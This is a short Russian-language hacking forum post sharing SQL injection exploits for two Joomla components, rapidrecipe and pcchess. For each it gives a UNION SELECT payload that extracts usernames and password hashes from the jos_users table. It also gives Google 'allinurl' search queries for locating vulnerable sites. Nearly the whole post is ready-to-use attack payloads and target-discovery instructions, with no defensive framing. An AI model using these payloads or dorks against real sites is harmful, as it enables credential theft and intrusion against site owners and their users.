12.02.2008, 22:59
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
Joomla Component rapidrecipe <= 1.6.5 SQL Injection
SQL Injection
Код:
after user_id or catogry_id add exploit
-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Для поиска:
Код:
allinurl: "com_rapidrecipe"user_id
allinurl: "com_rapidrecipe" category_id
Joomla Component pcchess <= 0.8 Remote SQL Injection
SQL Injection
Код:
index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Для поиска:
Код:
allinurl: com_pcchess "user_id"
allinurl: com_pcchess
(c)
|
|
|